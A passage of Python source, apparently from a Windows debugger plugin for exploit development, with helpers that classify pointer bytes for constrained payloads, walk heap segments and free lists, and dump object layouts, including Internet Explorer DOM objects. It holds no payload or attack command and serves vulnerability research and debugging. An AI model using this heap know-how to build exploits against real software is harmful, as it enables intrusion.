dsize = self.usersize + self.remaining
if dsize > 0 and dsize < 32:
contents = bin2hex(dbg.readMemory(self.userptr,self.usersize+self.remaining))
else:
contents = bin2hex(dbg.readMemory(self.userptr,32)) + " ..."
dbg.log(" Data : %s" % contents)
dbg.log("")
return
def showChunkLine(self,showdata = False):
return
#---------------------------------------#
# Class to access pointer properties #
#---------------------------------------#
class MnPointer:
"""
Class to access pointer properties
"""
def __init__(self,address):
# check that the address is an integer
if not type(address) == int and not type(address) == long:
raise Exception("address should be an integer or long")
self.address = address
NullRange = [0]
AsciiRange = range(1,128)
AsciiPrintRange = range(20,127)
AsciiUppercaseRange = range(65,91)
AsciiLowercaseRange = range(97,123)
AsciiAlphaRange = AsciiUppercaseRange + AsciiLowercaseRange
AsciiNumericRange = range(48,58)
AsciiSpaceRange = [32]
self.HexAddress = toHex(address)
# define the characteristics of the pointer
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = (0,)*8
if arch == 32:
byte1,byte2,byte3,byte4 = splitAddress(address)
elif arch == 64:
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = splitAddress(address)
# Nulls
self.hasNulls = (byte1 == 0) or (byte2 == 0) or (byte3 == 0) or (byte4 == 0)
# Starts with null
self.startsWithNull = (byte1 == 0)
# Unicode
self.isUnicode = ((byte1 == 0) and (byte3 == 0))
# Unicode reversed
self.isUnicodeRev = ((byte2 == 0) and (byte4 == 0))
if arch == 64:
self.hasNulls = self.hasNulls or (byte5 == 0) or (byte6 == 0) or (byte7 == 0) or (byte8 == 0)
self.isUnicode = self.isUnicode and ((byte5 == 0) and (byte7 == 0))
self.isUnicodeRev = self.isUnicodeRev and ((byte6 == 0) and (byte8 == 0))
# Unicode transform
self.unicodeTransform = UnicodeTransformInfo(self.HexAddress)
# Ascii
if not self.isUnicode and not self.isUnicodeRev:
self.isAscii = bytesInRange(address, AsciiRange)
else:
self.isAscii = bytesInRange(address, NullRange + AsciiRange)
# AsciiPrintable
if not self.isUnicode and not self.isUnicodeRev:
self.isAsciiPrintable = bytesInRange(address, AsciiPrintRange)
else:
self.isAsciiPrintable = bytesInRange(address, NullRange + AsciiPrintRange)
# Uppercase
if not self.isUnicode and not self.isUnicodeRev:
self.isUppercase = bytesInRange(address, AsciiUppercaseRange)
else:
self.isUppercase = bytesInRange(address, NullRange + AsciiUppercaseRange)
# Lowercase
if not self.isUnicode and not self.isUnicodeRev:
self.isLowercase = bytesInRange(address, AsciiLowercaseRange)
else:
self.isLowercase = bytesInRange(address, NullRange + AsciiLowercaseRange)
# Numeric
if not self.isUnicode and not self.isUnicodeRev:
self.isNumeric = bytesInRange(address, AsciiNumericRange)
else:
self.isNumeric = bytesInRange(address, NullRange + AsciiNumericRange)
# Alpha numeric
if not self.isUnicode and not self.isUnicodeRev:
self.isAlphaNumeric = bytesInRange(address, AsciiAlphaRange + AsciiNumericRange + AsciiSpaceRange)
else:
self.isAlphaNumeric = bytesInRange(address, NullRange + AsciiAlphaRange + AsciiNumericRange + AsciiSpaceRange)
# Uppercase + Numbers
if not self.isUnicode and not self.isUnicodeRev:
self.isUpperNum = bytesInRange(address, AsciiUppercaseRange + AsciiNumericRange)
else:
self.isUpperNum = bytesInRange(address, NullRange + AsciiUppercaseRange + AsciiNumericRange)
# Lowercase + Numbers
if not self.isUnicode and not self.isUnicodeRev:
self.isLowerNum = bytesInRange(address, AsciiLowercaseRange + AsciiNumericRange)
else:
self.isLowerNum = bytesInRange(address, NullRange + AsciiLowercaseRange + AsciiNumericRange)
def __str__(self):
"""
Get pointer properties (human readable format)
Arguments:
None
Return:
String with various properties about the pointer
"""
outstring = ""
if self.startsWithNull:
outstring += "startnull,"
elif self.hasNulls:
outstring += "null,"
#check if this pointer is unicode transform
hexaddr = self.HexAddress
outstring += UnicodeTransformInfo(hexaddr)
if self.isUnicode:
outstring += "unicode,"
if self.isUnicodeRev:
outstring += "unicodereverse,"
if self.isAsciiPrintable:
outstring += "asciiprint,"
if self.isAscii:
outstring += "ascii,"
if self.isUppercase:
outstring += "upper,"
if self.isLowercase:
outstring += "lower,"
if self.isNumeric:
outstring += "num,"
if self.isAlphaNumeric and not (self.isUppercase or self.isLowercase or self.isNumeric):
outstring += "alphanum,"
if self.isUpperNum and not (self.isUppercase or self.isNumeric):
outstring += "uppernum,"
if self.isLowerNum and not (self.isLowercase or self.isNumeric):
outstring += "lowernum,"
outstring = outstring.rstrip(",")
outstring += " {" + getPointerAccess(self.address)+"}"
return outstring
def getAddress(self):
return self.address
def isUnicode(self):
return self.isUnicode
def isUnicodeRev(self):
return self.isUnicodeRev
def isUnicodeTransform(self):
return self.unicodeTransform != ""
def isAscii(self):
return self.isAscii
def isAsciiPrintable(self):
return self.isAsciiPrintable
def isUppercase(self):
return self.isUppercase
def isLowercase(self):
return self.isLowercase
def isUpperNum(self):
return self.isUpperNum
def isLowerNum(self):
return self.isLowerNum
def isNumeric(self):
return self.isNumeric
def isAlphaNumeric(self):
return self.isAlphaNumeric
def hasNulls(self):
return self.hasNulls
def startsWithNull(self):
return self.startsWithNull
def belongsTo(self):
"""
Retrieves the module a given pointer belongs to
Arguments:
None
Return:
String with the name of the module a pointer belongs to,
or empty if pointer does not belong to a module
"""
if len(g_modules)==0:
populateModuleInfo()
for thismodule,modproperties in g_modules.iteritems():
thisbase = getModuleProperty(thismodule,"base")
thistop = getModuleProperty(thismodule,"top")
if (self.address >= thisbase) and (self.address <= thistop):
return thismodule
return ""
def isOnStack(self):
"""
Checks if the pointer is on one of the stacks of one of the threads in the process
Arguments:
None
Return:
Boolean - True if pointer is on stack
"""
stacks = getStacks()
for stack in stacks:
if (stacks[stack][0] <= self.address) and (self.address < stacks[stack][1]):
return True
return False
def isInHeap(self):
"""
Checks if the pointer is part of one of the pages associated with process heaps/segments
Arguments:
None
Return:
Boolean - True if pointer is in heap
"""
segmentcnt = 0
for heap in dbg.getHeapsAddress():
# part of a segment ?
segments = getSegmentsForHeap(heap)
for segment in segments:
if segmentcnt == 0:
# in heap data structure
if self.address >= heap and self.address <= segment:
return True
segmentcnt += 1
if self.address >= segment:
last = segments[segment][3]
if self.address >= segment and self.address <= last:
return True
# maybe it's in a VA List ?
for heap in dbg.getHeapsAddress():
mHeap = MnHeap(heap)
valist = mHeap.getVirtualAllocdBlocks()
if len(valist) > 0:
for vachunk in valist:
thischunk = valist[vachunk]
#dbg.log("self: 0x%08x, vachunk: 0x%08x, commitsize: 0x%08x, vachunk+(thischunk.commitsize)*8: 0x%08x" % (self.address,vachunk,thischunk.commitsize,vachunk+(thischunk.commitsize*8)))
if self.address >= vachunk and self.address <= (vachunk+(thischunk.commitsize*heapgranularity)):
return True
return False
def getHeapInfo(self):
global silent
oldsilent = silent
silent = True
foundinheap, foundinsegment, foundinva, foundinchunk = self.showHeapBlockInfo()
silent = oldsilent
return [foundinheap, foundinsegment, foundinva, foundinchunk]
def getHeapInfo_old(self):
"""
Returns heap related information about a given pointer
"""
heapinfo = {}
heapinfo["heap"] = 0
heapinfo["segment"] = 0
heapinfo["chunk"] = 0
heapinfo["size"] = 0
allheaps = dbg.getHeapsAddress()
for heap in allheaps:
dbg.log("checking heap 0x%08x for 0x%08x" % (heap,self.address))
theap = dbg.getHeap(heap)
heapchunks = theap.getChunks(heap)
if len(heapchunks) > 0 and not silent:
dbg.log("Querying segment(s) for heap 0x%s" % toHex(heap))
for hchunk in heapchunks:
chunkbase = hchunk.get("address")
chunksize = hchunk.get("size")
if self.address >= chunkbase and self.address <= (chunkbase+chunksize):
heapinfo["heap"] = heap
heapinfo["segment"] = 0
heapinfo["chunk"] = chunkbase
heapinfo["size"] = chunksize
return heapinfo
return heapinfo
def showObjectInfo(self):
# check if chunk is a DOM object
if __DEBUGGERAPP__ == "WinDBG":
cmdtorun = "dds 0x%08x L 1" % self.address
output = dbg.nativeCommand(cmdtorun)
outputlower = output.lower()
outputlines = output.split("\n")
if "vftable" in outputlower:
# is this Internet Explorer ?
ieversion = 0
if isModuleLoadedInProcess('iexplore.exe') and isModuleLoadedInProcess('mshtml.dll'):
ieversionstr = getModuleProperty('iexplore.exe','version')
dbg.log(" Internet Explorer v%s detected" % ieversionstr)
ieversion = 0
if ieversionstr.startswith("8."):
ieversion = 8
if ieversionstr.startswith("9."):
ieversion = 9
if ieversionstr.startswith("10."):
ieversion = 10
dbg.log(" 0x%08x may be the start of an object, vtable pointer: %s" % (self.address,outputlines[0]))
vtableptr_s = outputlines[0][10:18]
try:
vtableptr = hexStrToInt(vtableptr_s)
dbg.log(" Start of vtable at 0x%08x: (showing first 4 entries only)" % vtableptr)
cmdtorun = "dds 0x%08x L 4" % vtableptr
output = dbg.nativeCommand(cmdtorun)
outputlines = output.split("\n")
cnt = 0
for line in outputlines:
if line.replace(" ","") != "":
dbg.log(" +0x%x -> %s" % (cnt,line))
cnt += 4
if "mshtml!" in outputlower and ieversion > 7:
# see if we can find the object type, refcounter, attribute count, parent, etc
refcounter = None
attributeptr = None
try:
refcounter = dbg.readLong(self.address + 4)
except:
pass
try:
if ieversion == 8:
attributeptr = dbg.readLong(self.address + 0xc)
if ieversion == 9:
attributeptr = dbg.readLong(self.address + 0x10)
except:
pass
if not refcounter is None and not attributeptr is None:
dbg.log(" Refcounter: 0x%x (%d)" % (refcounter,refcounter))
if refcounter > 0x20000:
dbg.log(" Note: a huge refcounter value may indicate this is not a real DOM object")
if attributeptr == 0:
dbg.log(" No attributes found")
else:
ptrx = MnPointer(attributeptr)
if ptrx.isInHeap():
dbg.log(" Attribute info structure stored at 0x%08x" % attributeptr)
offset_nr = 0x4
nr_multiplier = 4
offset_tableptr = 0xc
offset_tabledata = 0
variant_offset = 4
attname_offset = 8
attvalue_offset = 0xc
if ieversion == 9:
nr_multiplier = 1
offset_nr = 0x4
offset_tableptr = 0x8
offset_tabledata = 4
variant_offset = 1
attname_offset = 4
attvalue_offset = 8
nr_attributes = dbg.readLong(attributeptr + offset_nr) / nr_multiplier
attributetableptr = dbg.readLong(attributeptr + offset_tableptr)
dbg.log(" +0x%02x : Nr of attributes: %d" % (offset_nr,nr_attributes))
dbg.log(" +0x%02x : Attribute table at 0x%08x" % (offset_tableptr,attributetableptr))
attcnt = 0
while attcnt < nr_attributes:
try:
dbg.log(" Attribute %d (at 0x%08x) :" % (attcnt+1,attributetableptr))
sec_dword = "%08x" % struct.unpack('<L',dbg.readMemory(attributetableptr+4,4))[0]
variant_type = int(sec_dword[0:2][:-1],16)
dbg.log(" Variant Type : 0x%02x (%s)" % (variant_type,getVariantType(variant_type)))
if variant_type > 0x1:
att_name = "<n.a.>"
try:
att_name_ptr = dbg.readLong(attributetableptr+attname_offset)
att_name_ptr_value = dbg.readLong(att_name_ptr+4)
att_name = dbg.readWString(att_name_ptr_value)
except:
att_name = "<n.a.>"
dbg.log(" 0x%08x + 0x%02x (0x%08x): 0x%08x : &Attribute name : '%s'" % (attributetableptr,attname_offset,attributetableptr+attname_offset,att_name_ptr,att_name))
att_value_ptr = dbg.readLong(attributetableptr+attvalue_offset)
ptrx = MnPointer(att_value_ptr)
if ptrx.isInHeap():
att_value = ""
if variant_type == 0x8:
att_value = dbg.readWString(att_value_ptr)
if variant_type == 0x16:
attv = dbg.readLong(att_value_ptr)
att_value = "0x%08x (%s)" % (attv,int("0x%08x" % attv,16))
if variant_type == 0x1e:
att_from = dbg.readLong(att_value_ptr)
att_value = dbg.readString(att_from)
if variant_type == 0x1f:
att_from = dbg.readLong(att_value_ptr)
att_value = dbg.readWString(att_from)
else:
att_value = "0x%08x (%s)" % (att_value_ptr,int("0x%08x" % att_value_ptr,16))
dbg.log(" 0x%08x + 0x%02x (0x%08x): 0x%08x : &Value : %s" % (attributetableptr,attvalue_offset,attributetableptr+attvalue_offset,att_value_ptr,att_value))
except:
dbg.logLines(traceback.format_exc(),highlight=True)
break
attributetableptr += 0x10
attcnt += 1
else:
dbg.log(" Invalid attribute ptr found (0x%08x). This may not be a real DOM object." % attributeptr)
offset_domtree = 0x14
if ieversion == 9:
offset_domtree = 0x1C
domtreeptr = dbg.readLong(self.address + offset_domtree)
if not domtreeptr is None:
dptrx = MnPointer(domtreeptr)
if dptrx.isInHeap():
currobj = self.address
moreparents = True
parentcnt = 0
dbg.log(" Object +0x%02x : Ptr to DOM Tree info: 0x%08x" % (offset_domtree,domtreeptr))
while moreparents:
# walk tree, get parents
parentspaces = " " * parentcnt
cmdtorun = "dds poi(poi(poi(0x%08x+0x%02x)+4)) L 1" % (currobj,offset_domtree)
output = dbg.nativeCommand(cmdtorun)
outputlower = output.lower()
outputlines = output.split("\n")
if "vftable" in outputlines[0]:
dbg.log(" %s Parent : %s" % (parentspaces,outputlines[0]))
parts = outputlines[0].split(" ")
try:
currobj = int(parts[0],16)
except:
currobj = 0
else:
moreparents = False
parentcnt += 3
if currobj == 0:
moreparents = False
except:
dbg.logLines(traceback.format_exc(),highlight=True)
pass
return
def showHeapBlockInfo(self):
"""
Find address in heap and print out info about heap, segment, chunk it belongs to
"""
allheaps = []
heapkey = 0
foundinheap = None
foundinsegment = None
foundinva = None
foundinchunk = None
dumpsize = 0
dodump = False
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
for heapbase in allheaps:
mHeap = MnHeap(heapbase)
heapbase_extra = ""
frontendinfo = []
frontendheapptr = 0
frontendheaptype = 0
if win7mode:
heapkey = mHeap.getEncodingKey()
if mHeap.usesLFH():
frontendheaptype = 0x2
heapbase_extra = " [LFH] "
frontendheapptr = mHeap.getLFHAddress()
frontendinfo = [frontendheaptype,frontendheapptr]
segments = mHeap.getHeapSegmentList()
#segments
for seg in segments:
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
allchunks = walkSegment(FirstEntry,LastValidEntry,heapbase)
for chunkptr in allchunks:
thischunk = allchunks[chunkptr]
thissize = thischunk.size*8
headersize = thischunk.headersize
if self.address >= chunkptr and self.address < (chunkptr + thissize):
# found it !
if not silent:
dbg.log("")
dbg.log("Address 0x%08x found in " % self.address)
thischunk.showChunk(showdata = True)
self.showObjectInfo()
self.showHeapStackTrace(thischunk)
dodump = True
dumpsize = thissize
foundinchunk = thischunk
foundinsegment = seg
foundinheap = heapbase
break
if not foundinchunk == None:
break
# VA
if foundinchunk == None:
# maybe it's in VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
for vaptr in vachunks:
thischunk = vachunks[vaptr]
if self.address >= vaptr and self.address <= vaptr + (thischunk.commitsize*8):
if not silent:
dbg.log("")
dbg.log("Address 0x%08x found in VirtualAllocdBlocks of heap 0x%08x" % (self.address,heapbase))
thischunk.showChunk(showdata = True)
self.showObjectInfo()
self.showHeapStackTrace(thischunk)
thissize = thischunk.usersize
dumpsize = thissize
dodump = True
foundinchunk = thischunk
foundinva = vaptr
foundinheap = heapbase
break
# perhaps chunk is in FEA
# if it is, it won't be a VA chunk
if foundinva == None:
if not win7mode:
foundinlal = False
foundinfreelist = False
FrontEndHeap = mHeap.getFrontEndHeap()
if FrontEndHeap > 0:
fea_lal = mHeap.getLookAsideList()
for lal_table_entry in sorted(fea_lal.keys()):
nr_of_chunks = len(fea_lal[lal_table_entry])
lalhead = struct.unpack('<L',dbg.readMemory(FrontEndHeap + (0x30 * lal_table_entry),4))[0]
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
if (self.address >= lalchunk.chunkptr) and (self.address < lalchunk.chunkptr+chunksize):
foundinlal = True
if not silent:
dbg.log("Address is part of chunk on LookAsideList[%d], heap 0x%08x" % (lal_table_entry,mHeap.heapbase))
break
if foundinlal:
expectedsize = lal_table_entry * 8
if not silent:
dbg.log(" LAL [%d] @0x%08x, Expected Chunksize: 0x%x (%d), %d chunks, Flink: 0x%08x" % (lal_table_entry,FrontEndHeap + (0x30 * lal_table_entry),expectedsize,expectedsize,nr_of_chunks,lalhead))
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
foundchunk = lalchunk
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
extra = " "
if (self.address >= lalchunk.chunkptr) and (self.address < lalchunk.chunkptr+chunksize):
extra = " --> "
if not silent:
dbg.log("%sChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, ChunkSize: 0x%x, UserSize: 0x%x, UserSpace: 0x%x (%s)" % (extra,lalchunk.chunkptr,lalchunk.userptr,lalchunk.flink,chunksize,lalchunk.usersize,lalchunk.usersize + lalchunk.remaining,flag))
if not silent:
self.showObjectInfo()
dumpsize = chunksize
dodump = True
break
if not foundinlal:
# or maybe in BEA
thisfreelist = mHeap.getFreeList()
thisfreelistinusebitmap = mHeap.getFreeListInUseBitmap()
for flindex in thisfreelist:
freelist_addy = heapbase + 0x178 + (8 * flindex)
expectedsize = ">1016"
expectedsize2 = ">0x%x" % 1016
if flindex != 0:
expectedsize2 = str(8 * flindex)
expectedsize = "0x%x" % (8 * flindex)
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
if (self.address >= freelist_chunk.chunkptr) and (self.address < freelist_chunk.chunkptr+chunksize):
foundinfreelist = True
if not silent:
dbg.log("Address is part of chunk on FreeLists[%d] at 0x%08x, heap 0x%08x:" % (flindex,freelist_addy,mHeap.heapbase))
break
if foundinfreelist:
flindicator = 0
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
extra = " "
if (self.address >= freelist_chunk.chunkptr) and (self.address < freelist_chunk.chunkptr+chunksize):
extra = " --> "
foundchunk = freelist_chunk
if not silent:
dbg.log("%sChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, Blink: 0x%08x, ChunkSize: 0x%x (%d), Usersize: 0x%x (%d)" % (extra,freelist_chunk.chunkptr,freelist_chunk.userptr,freelist_chunk.flink,freelist_chunk.blink,chunksize,chunksize,freelist_chunk.usersize,freelist_chunk.usersize))
if flindex != 0 and chunksize != (8*flindex):
dbg.log(" ** Header may be corrupted! **", highlight = True)
flindicator = 1
if flindex > 1 and int(thisfreelistinusebitmap[flindex]) != flindicator:
if not silent:
dbg.log(" ** FreeListsInUseBitmap mismatch for index %d! **" % flindex, highlight = True)
if not silent:
self.showObjectInfo()
dumpsize = chunksize
dodump = True
break
if dodump and dumpsize > 0 and dumpsize < 1025 and not silent:
self.dumpObjectAtLocation(dumpsize)
return foundinheap, foundinsegment, foundinva, foundinchunk
def showHeapStackTrace(self,thischunk):
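"""
If the chunk carries a DPH_BLOCK_INFORMATION header (ust/hpa GFlags set),
resolves and prints the associated allocation stack trace (WinDBG only)
"""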
# show stacktrace if any
if __DEBUGGERAPP__ == "WinDBG":
stacktrace_address = thischunk.dph_block_information_stacktrace
stacktrace_index = thischunk.dph_block_information_traceindex
stacktrace_startstamp = 0xabcdaaaa
if thischunk.hasust and stacktrace_address > 0:
if stacktrace_startstamp == thischunk.dph_block_information_startstamp:
cmd2run = "dds 0x%08x L 24" % (stacktrace_address)
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
if "!" in output:
dbg.log("Stack trace, index 0x%x:" % stacktrace_index)
dbg.log("--------------------------")
for outputline in outputlines:
if "!" in outputline:
lineparts = outputline.split(" ")
if len(lineparts) > 2:
firstpart = len(lineparts[0])+1
dbg.log(outputline[firstpart:])
return
def memLocation(self):
"""
Gets the memory location associated with a given pointer (modulename, stack, heap or empty)
Arguments:
None
Return:
String
"""
memloc = self.belongsTo()
if memloc == "":
if self.isOnStack():
return "Stack"
if self.isInHeap():
return "Heap"
return "??"
return memloc
def getPtrFunction(self):
funcinfo = ""
global silent
silent = True
if __DEBUGGERAPP__ == "WinDBG":
lncmd = "ln 0x%08x" % self.address
lnoutput = dbg.nativeCommand(lncmd)
for line in lnoutput.split("\n"):
if line.replace(" ","") != "" and line.find("%08x" % self.address) > -1:
lineparts = line.split("|")
funcrefparts = lineparts[0].split(")")
if len(funcrefparts) > 1:
funcinfo = funcrefparts[1].replace(" ","")
break
if funcinfo == "":
memloc = self.belongsTo()
if not memloc == "":
mod = MnModule(memloc)
if not mod is None:
start = mod.moduleBase
offset = self.address - start
offsettxt = ""
if offset > 0:
offsettxt = "+0x%08x" % offset
else:
offsettxt = "__base__"
funcinfo = memloc+offsettxt
silent = False
return funcinfo
def dumpObjectAtLocation(self,size,levels=0,nestedsize=0,customthislog="",customlogfile=""):
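"""
Dumps the object at the current address (using 'dps', WinDBG only) and
annotates every pointer-sized slot via getLocInfo(). Optionally recurses
into pointers to other objects, up to 'levels' deep, dumping 'nestedsize'
bytes for each nested object.
Return: dictionary, key = slot address, value = info list for that slot
"""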
dumpdata = {}
origdumpdata = {}
if __DEBUGGERAPP__ == "WinDBG":
addy = self.address
if not silent:
dbg.log("")
dbg.log("----------------------------------------------------")
dbg.log("[+] Dumping object at 0x%08x, 0x%02x bytes" % (addy,size))
if levels > 0:
dbg.log("[+] Also dumping up to %d levels deep, max size of nested objects: 0x%02x bytes" % (levels, nestedsize))
dbg.log("")
parentlist = []
levelcnt = 0
if customthislog == "" and customlogfile == "":
logfile = MnLog("dumpobj.txt")
thislog = logfile.reset()
else:
logfile = customlogfile
thislog = customthislog
addys = [addy]
parent = ""
parentdata = {}
while levelcnt <= levels:
thisleveladdys = []
for addy in addys:
cmdtorun = "dps 0x%08x L 0x%02x/%x" % (addy,size,archValue(4,8))
startaddy = addy
endaddy = addy + size
output = dbg.nativeCommand(cmdtorun)
outputlines = output.split("\n")
offset = 0
for outputline in outputlines:
if not outputline.replace(" ","") == "":
loc = outputline[0:archValue(8,17)].replace("`","")
content = outputline[archValue(10,19):archValue(18,36)].replace("`","")
symbol = outputline[archValue(19,37):]
if not "??" in content and symbol.replace(" ","") == "":
contentaddy = hexStrToInt(content)
info = self.getLocInfo(hexStrToInt(loc),contentaddy,startaddy,endaddy)
info.append(content)
dumpdata[hexStrToInt(loc)] = info
else:
info = ["",symbol,"",content]
dumpdata[hexStrToInt(loc)] = info
if addy in parentdata:
pdata = parentdata[addy]
parent = "Referenced at 0x%08x (object 0x%08x, offset +0x%02x)" % (pdata[0],pdata[1],pdata[0]-pdata[1])
else:
parent = ""
self.printObjDump(dumpdata,logfile,thislog,size,parent)
for loc in dumpdata:
thisdata = dumpdata[loc]
if thisdata[0] == "ptr_obj":
thisptr = int(thisdata[3],16)
thisleveladdys.append(thisptr)
parentdata[thisptr] = [loc,addy]
if levelcnt == 0:
origdumpdata = dumpdata
dumpdata = {}
addys = thisleveladdys
size = nestedsize
levelcnt += 1
dumpdata = origdumpdata
return dumpdata
def printObjDump(self,dumpdata,logfile,thislog,size=0,parent=""):
# dictionary, key = address
# 0 = type
# 1 = content info
# 2 = string type
# 3 = content
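        # hypothetical example entry :
        #   dumpdata[0x001df2a0] = ["ptr_str", "ptr to ASCII (0x08) 'AAAAAAAA'", "ascii", "00404040"]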
sortedkeys = sorted(dumpdata)
if len(sortedkeys) > 0:
startaddy = sortedkeys[0]
sizem = ""
parentinfo = ""
if size > 0:
sizem = " (0x%02x bytes)" % size
logfile.write("",thislog)
if parent == "":
logfile.write("=" * 60,thislog)
line = ">> Object at 0x%08x%s:" % (startaddy,sizem)
if not silent:
dbg.log("")
dbg.log(line)
logfile.write(line,thislog)
if parent != "":
line = " %s" % parent
if not silent:
dbg.log(line)
logfile.write(line,thislog)
line = "Offset Address Contents Info"
if arch == 64:
line = "Offset Address Contents Info"
logfile.write(line,thislog)
if not silent:
dbg.log(line)
line = "------ ------- -------- -----"
if arch == 64:
line = "------ ------- -------- -----"
logfile.write(line,thislog)
if not silent:
dbg.log(line)
offset = 0
for loc in sortedkeys:
info = dumpdata[loc]
if len(info) > 1:
content = ""
if len(info) > 3:
content = info[3]
contentinfo = toAsciiOnly(info[1])
offsetstr = toSize("%02x" % offset,4)
line = "+%s 0x%08x | 0x%s %s" % (offsetstr,loc,content,contentinfo)
if not silent:
dbg.log(line)
logfile.write(line,thislog)
offset += archValue(4,8)
if len(sortedkeys) > 0:
dbg.log("")
return
def getLocInfo(self,loc,addy,startaddy,endaddy):
locinfo = []
if addy >= startaddy and addy <= endaddy:
offset = addy - startaddy
locinfo = ["self","ptr to self+0x%08x" % offset,""]
return locinfo
ismapped = False
extra = ""
ptrx = MnPointer(addy)
memloc = ptrx.memLocation()
if not "??" in memloc:
if "Stack" in memloc or "Heap" in memloc:
extra = "(%s) " % memloc
else:
detailmemloc = ptrx.getPtrFunction()
extra = " (%s.%s)" % (memloc,detailmemloc)
# maybe it's a pointer to an object ?
cmd2run = "dps 0x%08x L 1" % addy
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
if len(outputlines) > 0:
if not "??" in outputlines[0]:
ismapped = True
ptraddy = outputlines[0][archValue(10,19):archValue(18,36)].replace("`","")
ptrinfo = outputlines[0][archValue(19,37):]
if ptrinfo.replace(" ","") != "":
if "vftable" in ptrinfo or "Heap" in memloc:
locinfo = ["ptr_obj","%sptr to 0x%08x : %s" % (extra,hexStrToInt(ptraddy),ptrinfo),str(addy)]
else:
locinfo = ["ptr","%sptr to 0x%08x : %s" % (extra,hexStrToInt(ptraddy),ptrinfo),str(addy)]
return locinfo
if ismapped:
# pointer to a string ?
try:
strdata = dbg.readString(addy)
if len(strdata) > 2:
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to ASCII (0x%02x) '%s'" % (extra,len(strdata),datastr),"ascii"]
return locinfo
except:
pass
# maybe it's unicode ?
try:
strdata = dbg.readWString(addy)
if len(strdata) > 2:
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to UNICODE (0x%02x) '%s'" % (extra,len(strdata),datastr),"unicode"]
return locinfo
except:
pass
# maybe the pointer points into a function ?
ptrf = ptrx.getPtrFunction()
if not ptrf == "":
locinfo = ["ptr_func","%sptr to %s" % (extra,ptrf),str(addy)]
return locinfo
# BSTR Unicode ?
try:
bstr = struct.unpack('<L',dbg.readMemory(addy,4))[0]
strdata = dbg.readWString(addy+4)
if len(strdata) > 2 and (bstr == len(strdata)+1):
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to BSTR UNICODE (0x%02x) '%s'" % (extra,bstr,datastr),"unicode"]
return locinfo
except:
pass
# pointer to a BSTR ASCII?
try:
strdata = dbg.readString(addy+4)
if len(strdata) > 2 and (bstr == len(strdata)/2):
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to BSTR ASCII (0x%02x) '%s'" % (extra,bstr,datastr),"ascii"]
return locinfo
except:
pass
# pointer itself is a string ?
if ptrx.isUnicode:
b1,b2,b3,b4,b5,b6,b7,b8 = (0,)*8
if arch == 32:
b1,b2,b3,b4 = splitAddress(addy)
if arch == 64:
b1,b2,b3,b4,b5,b6,b7,b8 = splitAddress(addy)
ptrstr = toAscii(toHexByte(b2)) + toAscii(toHexByte(b4))
if arch == 64:
ptrstr += toAscii(toHexByte(b6)) + toAscii(toHexByte(b8))
if ptrstr.replace(" ","") != "" and not toHexByte(b2) == "00":
locinfo = ["str","= UNICODE '%s' %s" % (ptrstr,extra),"unicode"]
return locinfo
if ptrx.isAsciiPrintable:
b1,b2,b3,b4,b5,b6,b7,b8 = (0,)*8
if arch == 32:
b1,b2,b3,b4 = splitAddress(addy)
if arch == 64:
b1,b2,b3,b4,b5,b6,b7,b8 = splitAddress(addy)
ptrstr = toAscii(toHexByte(b1)) + toAscii(toHexByte(b2)) + toAscii(toHexByte(b3)) + toAscii(toHexByte(b4))
if arch == 64:
ptrstr += toAscii(toHexByte(b5)) + toAscii(toHexByte(b6)) + toAscii(toHexByte(b7)) + toAscii(toHexByte(b8))
if ptrstr.replace(" ","") != "" and not toHexByte(b1) == "00" and not toHexByte(b2) == "00" and not toHexByte(b3) == "00" and not toHexByte(b4) == "00":
if arch != 64 or (not toHexByte(b5) == "00" and not toHexByte(b6) == "00" and not toHexByte(b7) == "00" and not toHexByte(b8) == "00"):
locinfo = ["str","= ASCII '%s' %s" % (ptrstr,extra),"ascii"]
return locinfo
# pointer to heap ?
if "Heap" in memloc:
if not "??" in outputlines[0]:
ismapped = True
                ptraddy = outputlines[0][archValue(10,19):archValue(18,36)].replace("`","")
locinfo = ["ptr_obj","%sptr to 0x%08x" % (extra,hexStrToInt(ptraddy)),str(addy)]
return locinfo
# nothing special to report
return ["","",""]
#---------------------------------------#
# Various functions #
#---------------------------------------#
def getDefaultProcessHeap():
peb = dbg.getPEBAddress()
defprocheap = struct.unpack('<L',dbg.readMemory(peb+0x18,4))[0]
return defprocheap
def getSortedSegmentList(heapbase):
segments = getSegmentsForHeap(heapbase)
sortedsegments = []
for seg in segments:
sortedsegments.append(seg)
sortedsegments.sort()
return sortedsegments
def getSegmentList(heapbase):
return getSegmentsForHeap(heapbase)
def getSegmentsForHeap(heapbase):
# either return the base of the segment, or the base of the default process heap
allsegmentsfound = False
segmentinfo = {}
global segmentlistCache
if heapbase in segmentlistCache:
return segmentlistCache[heapbase]
else:
try:
if win7mode:
# first one = heap itself
offset = getOsOffset("SegmentList")
segmentcnt = 0
subtract = archValue(0x10,0x18)
firstoffset = 0
firstsegbase = readPtrSizeBytes(heapbase + archValue(0x24,0x40))
firstsegend = readPtrSizeBytes(heapbase + archValue(0x28,0x48))
if not firstsegbase in segmentinfo:
segmentinfo[heapbase] = [firstsegbase,firstsegend,firstsegbase,firstsegend]
# optional list with additional segments
# nested list
